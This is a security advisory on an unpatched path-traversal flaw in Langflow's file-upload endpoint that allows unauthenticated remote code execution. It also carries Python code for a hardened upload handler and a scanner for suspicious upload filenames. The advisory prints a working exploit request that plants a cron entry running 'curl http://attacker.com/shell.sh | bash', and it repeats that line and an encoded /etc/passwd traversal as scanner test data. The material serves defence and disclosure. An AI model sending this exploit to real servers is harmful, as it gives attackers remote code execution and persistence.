
Unauthenticated RCE Flaw in Langflow Actively Exploited, No Patch Available

TL;DR CRITICAL
  • What happened: An unpatched path traversal in Langflow's file-upload endpoint lets an attacker write arbitrary files to the server, and therefore execute code, without any credentials.
  • Who's at risk: Any organisation running an internet-facing Langflow instance; roughly 7,000 such deployments are exposed and no patch is available.
  • Act now: Take all internet-facing Langflow instances offline or place them behind a VPN/firewall immediately · Disable unauthenticated auto-login in the Langflow configuration as an interim mitigation · Audit the filesystem and logs on every Langflow host for unexpected file writes (cron entries, web shells, altered configuration) and for anomalous POST requests to /api/v2/files

Overview

A high-severity, unpatched path traversal vulnerability tracked as CVE-2026-5027 (CVSS 8.8) in Langflow, a popular open-source, low-code platform for building AI and LLM-powered applications, is being actively exploited in the wild. Tenable discovered the flaw and VulnCheck has since confirmed in-the-wild exploitation; it enables unauthenticated remote code execution (RCE) on affected systems. With no patch available as of publication and roughly 7,000 Langflow instances exposed on the public internet, the threat surface is significant.

Technical Analysis

The vulnerability resides in the POST /api/v2/files endpoint, which does not sanitise the filename parameter of the multipart form data before using it to build the destination path. An attacker can supply path traversal sequences (../) to write a file to any location on the underlying filesystem that the Langflow process is allowed to write to. Because Langflow enables unauthenticated auto-login by default, no credentials are needed: a single unauthenticated HTTP request to the auto-login endpoint returns a valid session token, and with that token the attacker can write arbitrary files, including web shells, cron jobs or malicious configuration, to the server. In the request below, the number of ../ segments needed depends on how deep the configured upload directory sits, and the cron.d payload only works if the Langflow process runs as root or otherwise has write access to /etc/cron.d.

POST /api/v2/files HTTP/1.1
Host: <target>
Content-Type: multipart/form-data; boundary=----ExploitBoundary

------ExploitBoundary
Content-Disposition: form-data; name="file"; filename="../../etc/cron.d/backdoor"

* * * * * root curl http://attacker.com/shell.sh | bash
------ExploitBoundary--
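
The bug class in miniature, as an added illustration rather than code from Langflow, Tenable or VulnCheck: a naive upload handler joins the client-supplied filename onto the upload directory, while the hardened version resolves the candidate path and refuses anything that does not land strictly inside the resolved upload root. The filenames, the vulnerable handler and the throwaway upload directory are constructed for the example and are a pattern, not Langflow's actual code.

```python
import os
import tempfile
from pathlib import Path


def unsafe_target_path(upload_dir: str, filename: str) -> str:
    """Vulnerable pattern (an illustration, not Langflow's code): the multipart
    filename is joined onto the upload directory with no validation. '..'
    segments walk out of the directory and an absolute filename discards
    upload_dir entirely. normpath shows where the write would land."""
    return os.path.normpath(os.path.join(upload_dir, filename))


def safe_target_path(upload_dir: str, filename: str) -> Path:
    """Hardened pattern: resolve both the upload root and the candidate
    destination, then require the destination to sit strictly inside the
    root. resolve() collapses '..' and follows symlinks, so the check is made
    on the real path rather than on the attacker-controlled string."""
    root = Path(upload_dir).resolve()
    target = (root / filename).resolve()
    if root not in target.parents:
        raise ValueError(f"path escapes upload root: {filename!r}")
    return target


def escapes_root(upload_dir: str, path: str) -> bool:
    """True when a normalised absolute path lies outside upload_dir."""
    root = os.path.normpath(upload_dir)
    return os.path.commonpath([root, path]) != root


def run_demo() -> dict:
    """Constructed filenames an attacker could place in the multipart
    Content-Disposition header, evaluated against both handlers inside a
    throwaway upload directory. Returns {filename: (unsafe, safe)}."""
    attempts = [
        "report.pdf",                       # benign upload
        "flows/export.json",                # benign, in a subdirectory
        "../../../../etc/cron.d/backdoor",  # traversal, as in the advisory
        "/etc/cron.d/backdoor",             # absolute path
        "..",                               # the upload root's parent
    ]
    upload_dir = tempfile.mkdtemp(prefix="langflow-uploads-")
    results = {}
    try:
        for name in attempts:
            landing = unsafe_target_path(upload_dir, name)
            unsafe = "escapes" if escapes_root(upload_dir, landing) else "contained"
            try:
                safe_target_path(upload_dir, name)
                safe = "allowed"
            except ValueError:
                safe = "rejected"
            results[name] = (unsafe, safe)
    finally:
        os.rmdir(upload_dir)  # nothing was written, so the directory is empty
    return results


if __name__ == "__main__":
    for name, (unsafe, safe) in run_demo().items():
        print(f"{name!r:36} naive handler: {unsafe:9}  hardened handler: {safe}")
```

Over-long traversal strings cost the attacker nothing: once normalisation reaches the filesystem root, extra ../ segments are dropped, so real payloads simply overshoot rather than guess the upload directory's depth. The containment check is on the resolved path, not on the string, which is why string filters for "../" are the wrong fix.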

Tenable attempted to contact the project maintainers three times between January and February 2026 before publicly disclosing the flaw on March 27, 2026. VulnCheck subsequently confirmed active exploitation; the activity observed so far is limited to writing test files, which is likely reconnaissance ahead of more destructive payloads.

Framework Mapping

  • AML.T0047 (ML-Enabled Product or Service): Langflow is a direct enabler for building and deploying AI agents; compromising it gives adversaries access to the AI pipelines built within it.
  • AML.T0010 (ML Supply Chain Compromise): Attackers targeting AI development tooling can poison, backdoor, or exfiltrate models and data processed through Langflow workflows.
  • LLM05 (Supply Chain Vulnerabilities): The flaw exemplifies risk in the tooling layer of the LLM supply chain — infrastructure used to build AI applications rather than the models themselves.
  • LLM07 (Insecure Plugin Design): The unauthenticated auto-login default represents an insecure-by-default design pattern directly analogous to insecure plugin/component design.

Impact Assessment

Approximately 7,000 publicly accessible Langflow instances exist, predominantly in North America. Successful exploitation gives full RCE, so an attacker can exfiltrate sensitive data (API keys, model weights, training data), backdoor AI pipelines, or pivot into the wider enterprise network. The threat is compounded by earlier Langflow CVEs having been weaponised by the Iranian state-sponsored group MuddyWater, which shows that capable actors already target this attack surface. Organisations using Langflow to build production AI agents or to process sensitive data face the highest residual risk.

Mitigation & Recommendations

  1. Remove public exposure immediately: Place all Langflow instances behind a VPN, zero-trust gateway, or firewall. Do not expose the web UI or API to the public internet.
  2. Disable auto-login: Set LANGFLOW_AUTO_LOGIN=false in your environment configuration so that every endpoint requires a login. This removes the free session token an anonymous attacker relies on, but it does not fix the traversal itself: anyone holding a valid session, including a user whose token has been stolen, can still write files. Treat it as a stopgap, not a fix.
  3. Monitor for exploitation indicators: The traversal sequence travels in the multipart body, not in the URL, so access logs that record only the request line will not show it. Inspect application logs and reverse-proxy or WAF request captures for POST /api/v2/files requests whose declared filename contains ../, and check the filesystem for files the Langflow process should not have created, such as new cron entries, web shells or modified configuration.
  4. Isolate Langflow environments: Run Langflow as a low-privileged account and ensure it has no privileged access to production model stores, databases, or cloud credentials. An arbitrary file write is only as damaging as the account performing it.
  5. Track upstream patch status: Monitor the Langflow GitHub repository and CVE advisories closely; apply any patch immediately upon release.
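
Finding the indicator from mitigation 3 in practice, as an added example that is not from the page, Langflow or the researchers: the script assumes you have raw request captures from a reverse proxy or WAF (an assumption), parses each captured POST /api/v2/files request as MIME with the standard library, and flags declared filenames that contain dot-dot segments, absolute paths, null bytes or percent-encoded variants. The host name, boundary and sample captures are constructed; the first capture mirrors the request shown in the Technical Analysis.

```python
import re
from email.parser import BytesParser
from urllib.parse import unquote

UPLOAD_PATH = "/api/v2/files"
# A '..' that forms a whole path segment, with either separator.
DOT_DOT_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def _split_request(raw: bytes):
    """Separate the HTTP request line from the MIME-style headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    return request_line.decode("latin-1"), header_block + b"\r\n\r\n" + body


def multipart_filenames(raw: bytes) -> list:
    """Every filename declared in the multipart body of a raw HTTP request.
    The stdlib email parser handles multipart/form-data well enough to
    expose each part's Content-Disposition filename parameter."""
    _, mime = _split_request(raw)
    msg = BytesParser().parsebytes(mime)
    return [p.get_filename() for p in msg.walk() if p.get_filename() is not None]


def traversal_indicators(filename: str) -> list:
    """Defender-side heuristics applied to a declared upload filename."""
    decoded = unquote(filename)  # also inspect %2e%2e / %2f forms
    hits = []
    if DOT_DOT_SEGMENT.search(decoded):
        hits.append("dot-dot segment")
    if decoded.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:[\\/]", decoded):
        hits.append("absolute path")
    if decoded != filename:
        hits.append("percent-encoding in filename")
    if "\x00" in decoded:
        hits.append("null byte")
    return hits


def scan_request(raw: bytes) -> list:
    """Alerts for one captured request; empty unless it is an upload to the
    vulnerable endpoint carrying at least one suspicious filename."""
    request_line, _ = _split_request(raw)
    parts = request_line.split(" ")
    if len(parts) < 2 or parts[0] != "POST" or parts[1].split("?")[0] != UPLOAD_PATH:
        return []
    return [{"filename": n, "indicators": traversal_indicators(n)}
            for n in multipart_filenames(raw) if traversal_indicators(n)]


def _build_upload(filename: str, content: bytes) -> bytes:
    """Constructed capture of a POST /api/v2/files request (sample data only)."""
    boundary = b"----ExploitBoundary"
    body = (b"--" + boundary + b"\r\n"
            b'Content-Disposition: form-data; name="file"; filename="'
            + filename.encode() + b'"\r\n\r\n' + content + b"\r\n--" + boundary + b"--\r\n")
    return (b"POST /api/v2/files HTTP/1.1\r\nHost: langflow.internal\r\n"
            b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# Constructed captures: one benign upload and three hostile variants.
SAMPLES = {
    "benign": _build_upload("report.pdf", b"%PDF-1.4 ..."),
    "advisory": _build_upload("../../etc/cron.d/backdoor",
                              b"* * * * * root curl http://attacker.com/shell.sh | bash"),
    "encoded": _build_upload("%2e%2e/%2e%2e/etc/passwd", b"root::0:0::/:/bin/sh"),
    "absolute": _build_upload("/etc/cron.d/backdoor", b"* * * * * root id"),
}


def scan_all() -> dict:
    """Run the scanner over every constructed capture."""
    return {label: scan_request(raw) for label, raw in SAMPLES.items()}


if __name__ == "__main__":
    for label, alerts in scan_all().items():
        print(label, alerts or "clean")
```

Percent-encoded filenames are flagged even though a multipart parser does not normally decode them, because an upstream component may, and an encoded dot-dot in a filename has no legitimate purpose. Pair the scanner with filesystem monitoring: VulnCheck reports attackers writing test files, and a new file outside the upload directory is the surest sign the request succeeded.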
